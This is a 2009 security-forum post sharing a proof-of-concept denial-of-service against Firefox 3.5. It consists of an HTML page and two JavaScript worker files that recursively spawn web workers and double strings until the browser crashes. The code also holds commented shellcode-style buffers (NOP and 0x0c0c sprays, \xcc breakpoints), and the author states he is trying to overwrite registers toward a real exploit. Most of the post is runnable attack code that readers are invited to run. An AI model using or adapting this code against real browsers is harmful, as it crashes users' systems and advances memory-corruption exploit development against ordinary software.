Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Does this code crash your Firefox?
Posted by: malloci
Date: September 24, 2009 03:54PM

Couldn't help it... just had to add a third thread with the same name. Hey, at least I didn't copy my code line for line from the other posts (just my own post).

Either way, I am fairly sure this code will crash your Firefox 3.5 browser.

This is just one version of the PoC I have been coding. It is ugly code but should serve as an example to use for debugging FF3.5. Hope to get some feedback (crashes, debug, comments, ideas).

-------------------------------------
index.html
-------------------------------------
<!DOCTYPE HTML>
<html>
<head>
<title>DOS</title>
</head>
<body>
<h1>Please Wait, while I CRASH your Browser; it should not take long :)...</h1>
<div id="result"></div>

<script type="text/javascript">
// Spawn the first worker; it will spawn further workers itself (see workCRASH.js)
var worker = new Worker("workCRASH.js");

// Watch for messages from the worker
worker.onmessage = function(event)
{
    // The message from the worker is in event.data
    // alert(document.domain + " - " + event.data);
    // window.location = 'index.html';
    // window.open ('index.html');
    document.getElementById("result").textContent = event.data;
};
//var buf = unescape("%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
//var buf = unescape("%u0c0c%u0c0c");
var buf = unescape("\xcc\xcc\xcc\xcc");
var str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
buf = buf+str;
worker.postMessage(buf);

</script>
</body>
</html>

-----------------------------------------------------------
workCRASH.js
--------------------------------------------

// Every message received makes this worker spawn a copy of itself plus a
// workCRASH-Test.js worker, and each of them echoes a doubled string back up.
onmessage = function(event){

    var worker = new Worker("workCRASH.js");
    worker.onmessage = function(event)
    {
        var worker = new Worker("workCRASH-Test.js");
        worker.onmessage = function(event)
        {
            worker.postMessage(event.data.concat(event.data));
            CollectGarbage();
            postMessage(event.data.concat(event.data));
            CollectGarbage();
        };
        worker.postMessage(event.data.concat(event.data));
        postMessage(event.data.concat(event.data));
    };

    worker.postMessage(event.data.concat(event.data));
    postMessage(event.data.concat(event.data));

}

-------------------------------------
workCRASH-Test.js
------------------------------------

// Same pattern as workCRASH.js: each message spawns another copy of this
// worker and grows the string before passing it back up.
onmessage = function(event){

    var worker = new Worker("workCRASH-Test.js");
    worker.onmessage = function(event)
    {
        //var nop = unescape("\x90\x90\x90\x90");

        var str1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        var str2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

        worker.postMessage(event.data.concat(str1+str2));
        postMessage(event.data.concat(str1+str2));
    };

    worker.postMessage(event.data.concat(event.data));
    postMessage(event.data);

}

____________________________________

The code is a mess right now... I have been fuzzing it with different input. Give it a go and let me know if it crashes your FF3.5 browser. If you have any time to debug the crash please post some output.

You might have to run the code a few times to get it to crash in a different place than the xul!XPCNativeSet::Mark: error. Like I said I have not had too much time to work on the code, it is mostly a jumbled mess right now. I still am trying to find out how I can overwrite the registers.

malloc(i)
